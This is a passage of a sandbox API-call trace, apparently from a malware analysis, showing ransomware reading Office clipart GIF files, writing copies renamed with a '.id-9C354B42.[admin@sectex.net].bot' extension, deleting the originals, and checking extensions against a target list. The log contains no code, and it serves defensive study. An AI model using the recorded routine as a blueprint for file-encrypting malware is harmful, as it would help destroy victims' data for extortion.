	[0053.337] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x2e73, lpOverlapped=0x0) returned 1
	[0053.341] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x2e80, lpOverlapped=0x0) returned 1
	[0053.342] ReadFile (in: hFile=0x188, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.342] WriteFile (in: hFile=0x1f4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.342] SetEndOfFile (hFile=0x1f4) returned 1
	[0053.342] CloseHandle (hObject=0x1f4) returned 1
	[0053.343] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.343] SetEndOfFile (hFile=0x188) returned 1
	[0054.769] CloseHandle (hObject=0x188) returned 1
	[0055.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 1
	[0055.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.214] lstrlenW (lpString=".doc") returned 4
	[0055.214] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.214] lstrlenW (lpString=".docx") returned 5
	[0055.214] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.214] lstrlenW (lpString=".pdf") returned 4
	[0055.214] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.214] lstrlenW (lpString=".xls") returned 4
	[0055.214] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.214] lstrlenW (lpString=".xlsx") returned 5
	[0055.214] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.214] lstrlenW (lpString=".ppt") returned 4
	[0055.214] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.215] lstrlenW (lpString=".zip") returned 4
	[0055.215] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.215] lstrlenW (lpString=".rar") returned 4
	[0055.215] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.215] lstrlenW (lpString=".bz2") returned 4
	[0055.215] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.215] lstrlenW (lpString=".7z") returned 3
	[0055.215] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.215] lstrlenW (lpString=".dbf") returned 4
	[0055.215] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.215] lstrlenW (lpString=".1cd") returned 4
	[0055.215] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.215] lstrlenW (lpString=".jpg") returned 4
	[0055.215] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.215] lstrlenW (lpString=".doc") returned 4
	[0055.215] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.215] lstrlenW (lpString=".docx") returned 5
	[0055.215] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.215] lstrlenW (lpString=".pdf") returned 4
	[0055.215] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.216] lstrlenW (lpString=".xls") returned 4
	[0055.216] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.216] lstrlenW (lpString=".xlsx") returned 5
	[0055.216] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.216] lstrlenW (lpString=".ppt") returned 4
	[0055.216] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.216] lstrlenW (lpString=".zip") returned 4
	[0055.216] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.216] lstrlenW (lpString=".rar") returned 4
	[0055.216] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.216] lstrlenW (lpString=".bz2") returned 4
	[0055.216] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.216] lstrlenW (lpString=".7z") returned 3
	[0055.216] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.216] lstrlenW (lpString=".dbf") returned 4
	[0055.216] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.216] lstrlenW (lpString=".1cd") returned 4
	[0055.216] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63
	[0055.216] lstrlenW (lpString=".jpg") returned 4
	[0055.216] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.216] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.216] lstrlenW (lpString="AG00142_.GIF") returned 12
	[0055.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0055.331] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=15308) returned 1
	[0055.331] CloseHandle (hObject=0x1f0) returned 1
	[0055.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 0x20
	[0055.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0055.331] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.331] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.332] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0055.332] GetLastError () returned 0x0
	[0055.332] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x3bcc, lpOverlapped=0x0) returned 1
	[0055.482] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x3bd0, lpOverlapped=0x0) returned 1
	[0055.483] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.483] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.483] SetEndOfFile (hFile=0x1a0) returned 1
	[0055.484] CloseHandle (hObject=0x1a0) returned 1
	[0055.484] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.484] SetEndOfFile (hFile=0x1f0) returned 1
	[0055.485] CloseHandle (hObject=0x1f0) returned 1
	[0055.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif")) returned 1
	[0055.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.485] lstrlenW (lpString=".doc") returned 4
	[0055.485] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.485] lstrlenW (lpString=".docx") returned 5
	[0055.485] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.485] lstrlenW (lpString=".pdf") returned 4
	[0055.485] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.485] lstrlenW (lpString=".xls") returned 4
	[0055.485] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.485] lstrlenW (lpString=".xlsx") returned 5
	[0055.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.485] lstrlenW (lpString=".ppt") returned 4
	[0055.485] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.485] lstrlenW (lpString=".zip") returned 4
	[0055.486] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString=".rar") returned 4
	[0055.486] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString=".bz2") returned 4
	[0055.486] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.486] lstrlenW (lpString=".7z") returned 3
	[0055.486] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.486] lstrlenW (lpString=".dbf") returned 4
	[0055.486] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.486] lstrlenW (lpString=".1cd") returned 4
	[0055.486] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.486] lstrlenW (lpString=".jpg") returned 4
	[0055.486] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.486] lstrlenW (lpString=".doc") returned 4
	[0055.486] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.486] lstrlenW (lpString=".docx") returned 5
	[0055.486] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.486] lstrlenW (lpString=".pdf") returned 4
	[0055.486] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString=".xls") returned 4
	[0055.486] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString=".xlsx") returned 5
	[0055.486] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.486] lstrlenW (lpString=".ppt") returned 4
	[0055.486] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.486] lstrlenW (lpString=".zip") returned 4
	[0055.486] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.486] lstrlenW (lpString=".rar") returned 4
	[0055.487] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.487] lstrlenW (lpString=".bz2") returned 4
	[0055.487] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.487] lstrlenW (lpString=".7z") returned 3
	[0055.487] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.487] lstrlenW (lpString=".dbf") returned 4
	[0055.487] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.487] lstrlenW (lpString=".1cd") returned 4
	[0055.487] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.487] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 63
	[0055.487] lstrlenW (lpString=".jpg") returned 4
	[0055.487] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.487] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.487] lstrlenW (lpString="AG00160_.GIF") returned 12
	[0055.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0055.487] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=1146) returned 1
	[0055.487] CloseHandle (hObject=0x1f0) returned 1
	[0055.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 0x20
	[0055.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0055.488] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.488] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0055.488] GetLastError () returned 0x0
	[0055.488] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x47a, lpOverlapped=0x0) returned 1
	[0055.513] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x480, lpOverlapped=0x0) returned 1
	[0055.514] ReadFile (in: hFile=0x1f0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.514] WriteFile (in: hFile=0x1a0, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.515] SetEndOfFile (hFile=0x1a0) returned 1
	[0055.515] CloseHandle (hObject=0x1a0) returned 1
	[0055.515] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.515] SetEndOfFile (hFile=0x1f0) returned 1
	[0055.516] CloseHandle (hObject=0x1f0) returned 1
	[0055.516] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.516] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00160_.gif")) returned 1
	[0055.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.554] lstrlenW (lpString=".doc") returned 4
	[0055.554] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.554] lstrlenW (lpString=".docx") returned 5
	[0055.554] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.554] lstrlenW (lpString=".pdf") returned 4
	[0055.554] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.554] lstrlenW (lpString=".xls") returned 4
	[0055.554] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.554] lstrlenW (lpString=".xlsx") returned 5
	[0055.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.554] lstrlenW (lpString=".ppt") returned 4
	[0055.554] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.554] lstrlenW (lpString=".zip") returned 4
	[0055.554] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.554] lstrlenW (lpString=".rar") returned 4
	[0055.554] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.554] lstrlenW (lpString=".bz2") returned 4
	[0055.554] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.554] lstrlenW (lpString=".7z") returned 3
	[0055.555] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.555] lstrlenW (lpString=".dbf") returned 4
	[0055.555] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.555] lstrlenW (lpString=".1cd") returned 4
	[0055.555] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.555] lstrlenW (lpString=".jpg") returned 4
	[0055.555] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.555] lstrlenW (lpString=".doc") returned 4
	[0055.555] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.555] lstrlenW (lpString=".docx") returned 5
	[0055.555] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.555] lstrlenW (lpString=".pdf") returned 4
	[0055.555] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.555] lstrlenW (lpString=".xls") returned 4
	[0055.555] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.555] lstrlenW (lpString=".xlsx") returned 5
	[0055.555] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.555] lstrlenW (lpString=".ppt") returned 4
	[0055.555] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.555] lstrlenW (lpString=".zip") returned 4
	[0055.555] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.555] lstrlenW (lpString=".rar") returned 4
	[0055.555] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.555] lstrlenW (lpString=".bz2") returned 4
	[0055.555] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.555] lstrlenW (lpString=".7z") returned 3
	[0055.555] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.556] lstrlenW (lpString=".dbf") returned 4
	[0055.556] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.556] lstrlenW (lpString=".1cd") returned 4
	[0055.556] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00160_.GIF") returned 63
	[0055.556] lstrlenW (lpString=".jpg") returned 4
	[0055.556] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.556] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.556] lstrlenW (lpString="AG00164_.GIF") returned 12
	[0055.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0057.867] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=13254) returned 1
	[0057.867] CloseHandle (hObject=0x1c0) returned 1
	[0057.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif")) returned 0x20
	[0057.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0057.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0057.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0057.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00164_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0057.900] GetLastError () returned 0x0
	[0057.900] ReadFile (in: hFile=0x21c, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x33c6, lpOverlapped=0x0) returned 1
